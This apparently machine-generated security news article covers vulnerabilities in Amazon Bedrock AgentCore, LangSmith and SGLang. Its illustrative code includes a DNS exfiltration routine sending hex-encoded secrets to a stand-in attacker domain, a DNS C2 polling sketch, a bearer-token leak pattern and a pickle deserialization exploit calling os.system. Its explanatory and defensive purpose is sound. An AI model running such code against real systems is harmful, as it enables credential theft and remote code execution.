Ethical Hacking News
Recently disclosed vulnerabilities in Amazon Bedrock AgentCore, LangSmith, and SGLang underscore the need for organizations to prioritize security when working with AI platforms. The flaws expose sensitive data to theft and open the door to unauthorized access, making an understanding of them essential for keeping AI-powered systems safe.
In brief: the Amazon Bedrock AgentCore Code Interpreter's sandbox mode allows outbound DNS queries, which an attacker can exploit to establish a command-and-control channel, bypass network isolation controls, and exfiltrate sensitive data from AWS resources. A vulnerability in the LangSmith framework allows attackers to steal users' bearer tokens and other sensitive information through social engineering. The SGLang framework is affected by unauthenticated remote code execution vulnerabilities, including one in its ZeroMQ broker. Amazon recommends using VPC mode instead of sandbox mode for complete network isolation and suggests a DNS firewall to filter outbound DNS traffic, and experts are urging organizations to take immediate action to secure their AI platforms.
Cybersecurity researchers have recently uncovered significant vulnerabilities in Amazon Bedrock, LangSmith, and SGLang, three popular artificial intelligence (AI) platforms used by organizations worldwide. The flaws were found through a thorough analysis of each platform's code execution environment.
According to the report published by BeyondTrust, an attacker can exploit the DNS query mechanism in sandbox mode to establish a command-and-control channel, bypass network isolation controls, and exfiltrate sensitive data from AWS resources. This means that even an organization that has implemented otherwise robust security measures may still be exposed to data theft and unauthorized access.
The issue stems from the Amazon Bedrock AgentCore Code Interpreter's sandbox mode allowing outbound DNS queries, which attackers can use to set up a bidirectional communication channel built from DNS queries and responses. If the IAM role attached to the interpreter has permissions to access AWS resources, sensitive information can then be exfiltrated through those queries.
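To make the mechanism concrete, here is a minimal sketch of how DNS-based exfiltration works in general: data is encoded into subdomain labels of a zone the attacker controls, so every lookup carries a chunk of data to the attacker's authoritative nameserver. The domain attacker-c2.example and the credential string are hypothetical, and this illustrates the technique class rather than the researchers' actual proof of concept.

```python
# Minimal sketch of DNS-based exfiltration: data is hex-encoded into
# subdomain labels of an attacker-controlled zone, so each lookup the
# sandbox performs carries a chunk of data to the attacker's nameserver.
import socket

C2_ZONE = "attacker-c2.example"   # hypothetical attacker-controlled zone
LABEL_LIMIT = 60                  # DNS labels max out at 63 bytes

def exfiltrate(data: bytes) -> None:
    encoded = data.hex()
    chunks = [encoded[i:i + LABEL_LIMIT]
              for i in range(0, len(encoded), LABEL_LIMIT)]
    for seq, chunk in enumerate(chunks):
        # A query like "0.6d7953656372.attacker-c2.example" reaches the
        # attacker's nameserver even though the lookup itself "fails".
        try:
            socket.getaddrinfo(f"{seq}.{chunk}.{C2_ZONE}", 443)
        except socket.gaierror:
            pass  # NXDOMAIN is fine; the query already leaked the data

exfiltrate(b"AKIA...example-credential")  # placeholder secret
```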
The report also highlights that the technique is not limited to AWS resources: it can be used to deliver additional payloads to the Code Interpreter, causing it to poll a command-and-control (C2) server for commands stored in DNS A records and execute them. An attacker could thereby gain control over the AI platform itself and use it to reach sensitive data.
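The command channel can be sketched the same way. In the pattern the report describes, the interpreter resolves a name the attacker controls and reassembles command bytes from the A-record answers (each IPv4 address carries four bytes). The name below is hypothetical, and the sketch deliberately stops at decoding rather than executing anything.

```python
# Sketch of C2 polling over DNS A records: each IPv4 answer smuggles
# four bytes of payload. Real tunnels embed sequence numbers in the
# records; sorting the address strings here is purely illustrative.
import socket

def poll_for_command(name: str = "cmd.attacker-c2.example") -> bytes:
    try:
        # Collect the A records returned for the polled name.
        answers = sorted({info[4][0] for info in
                          socket.getaddrinfo(name, None, socket.AF_INET)})
    except socket.gaierror:
        return b""  # no command published yet
    # 105.100.0.0 -> b"id\x00\x00"; concatenate and strip padding.
    payload = b"".join(bytes(int(octet) for octet in addr.split("."))
                       for addr in answers)
    return payload.rstrip(b"\x00")

command = poll_for_command()  # decoded only; never passed to a shell here
```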
The LangSmith framework is also vulnerable to a high-severity security flaw, characterized as URL parameter injection stemming from a lack of validation on the baseUrl parameter. By tricking victims into clicking specially crafted links, attackers can cause users' bearer tokens, user IDs, and workspace IDs to be transmitted to a server under the attackers' control.
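The underlying pattern is easy to illustrate. The sketch below is not LangSmith's actual code; it shows the general flaw class, in which a client accepts an attacker-influenced baseUrl and attaches its bearer token to whatever host that URL names. The allowlisted host in the mitigation is an assumption about the legitimate API endpoint.

```python
# Illustration of the flaw class (not LangSmith's actual code): a client
# that accepts an unvalidated baseUrl and attaches its bearer token to
# every request will happily send credentials to any host.
import urllib.request
from urllib.parse import urlparse

def fetch_runs(base_url: str, bearer_token: str) -> bytes:
    # Vulnerable pattern: base_url comes from a link/query parameter and
    # is never checked against an allowlist of trusted API hosts.
    req = urllib.request.Request(
        f"{base_url}/runs",
        headers={"Authorization": f"Bearer {bearer_token}"},
    )
    with urllib.request.urlopen(req) as resp:
        return resp.read()

# A crafted link only needs to swap the parameter:
#   https://app.example/?baseUrl=https://attacker-c2.example
# and the victim's token is sent to the attacker. Mitigation sketch:
ALLOWED_HOSTS = {"api.smith.langchain.com"}  # assumption: legitimate host

def safe_base_url(base_url: str) -> str:
    host = urlparse(base_url).hostname
    if host not in ALLOWED_HOSTS:
        raise ValueError(f"untrusted baseUrl host: {host!r}")
    return base_url
```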
The SGLang framework is likewise affected by several security vulnerabilities, including unauthenticated remote code execution through the ZeroMQ (aka ZMQ) broker: attacker-supplied messages can trigger unsafe pickle deserialization, which leads to remote code execution if successfully exploited.
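This bug class is well known. The following is an illustrative reconstruction rather than SGLang's exact code: a service that binds an unauthenticated ZeroMQ socket and unpickles whatever arrives hands code execution to the sender, because unpickling invokes __reduce__ on objects the sender crafts.

```python
# Illustrative vulnerable pattern (not SGLang's exact code): unpickling
# untrusted ZeroMQ messages gives the sender code execution.
import pickle
import zmq

ctx = zmq.Context()
sock = ctx.socket(zmq.PULL)
sock.bind("tcp://0.0.0.0:5555")  # unauthenticated: anyone who can reach
                                 # this port can submit a payload

msg = sock.recv()
obj = pickle.loads(msg)  # DANGEROUS: runs attacker code during load

# What an attacker would send: any object whose __reduce__ returns a
# callable, which pickle.loads then invokes on the victim.
class Exploit:
    def __reduce__(self):
        import os
        return (os.system, ("id",))  # executed at unpickling time

# Safer alternatives: a non-executable format such as JSON, plus
# transport authentication (e.g. ZeroMQ CURVE) so only trusted peers
# can reach the broker at all.
```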
In response to these vulnerabilities, Amazon has recommended that customers use VPC mode instead of sandbox mode for complete network isolation. They have also suggested the use of a DNS firewall to filter outbound DNS traffic.
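On AWS, one way to follow the DNS-firewall suggestion is Route 53 Resolver DNS Firewall, which filters DNS queries leaving a VPC. Below is a minimal boto3 sketch under stated assumptions; the VPC ID, names, domain entries, and priorities are placeholders to adapt, not values from the report.

```python
# Sketch: block resolution of known-bad zones for a VPC using Route 53
# Resolver DNS Firewall. All identifiers below are placeholders.
import uuid
import boto3

resolver = boto3.client("route53resolver")

# Domain list of zones that outbound queries should never reach.
domains = resolver.create_firewall_domain_list(
    CreatorRequestId=str(uuid.uuid4()), Name="agentcore-blocked-zones"
)["FirewallDomainList"]
resolver.update_firewall_domains(
    FirewallDomainListId=domains["Id"],
    Operation="ADD",
    Domains=["attacker-c2.example."],  # placeholder entry
)

# Rule group with a BLOCK rule referencing that domain list.
group = resolver.create_firewall_rule_group(
    CreatorRequestId=str(uuid.uuid4()), Name="agentcore-dns-firewall"
)["FirewallRuleGroup"]
resolver.create_firewall_rule(
    CreatorRequestId=str(uuid.uuid4()),
    FirewallRuleGroupId=group["Id"],
    FirewallDomainListId=domains["Id"],
    Priority=100,
    Action="BLOCK",
    BlockResponse="NXDOMAIN",
    Name="block-exfil-zones",
)

# Attach the rule group to the VPC hosting the interpreter (VPC mode).
resolver.associate_firewall_rule_group(
    CreatorRequestId=str(uuid.uuid4()),
    FirewallRuleGroupId=group["Id"],
    VpcId="vpc-0123456789abcdef0",  # placeholder VPC ID
    Priority=101,
    Name="agentcore-vpc-association",
)
```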
Experts are urging organizations to take immediate action to secure their AI platforms against these vulnerabilities. This includes inventorying all active AgentCore Code Interpreter instances and migrating those handling critical data from sandbox mode to VPC mode.
Jason Soroko, senior fellow at Sectigo, has emphasized the importance of rigorous auditing and enforcing the principle of least privilege to restrict the blast radius of any potential compromise.
As AI platforms become increasingly ubiquitous in organizations worldwide, it is essential to take these vulnerabilities seriously and prioritize security measures that prevent data breaches and unauthorized access. The recent discoveries in Amazon Bedrock, LangSmith, and SGLang serve as a stark reminder of the need for robust security protocols when working with AI.
Related Information:
https://www.ethicalhackingnews.com/articles/A-Critical-Look-at-Amazons-AI-Flaws-What-You-Need-to-Know-ehn.shtml
https://thehackernews.com/2026/03/ai-flaws-in-amazon-bedrock-langsmith.html
https://aws.amazon.com/blogs/security/hardening-the-rag-chatbot-architecture-powered-by-amazon-bedrock-blueprint-for-secure-design-and-anti-pattern-migration/
Published: Tue Mar 17 12:54:17 2026 by llama3.2 3B Q4_K_M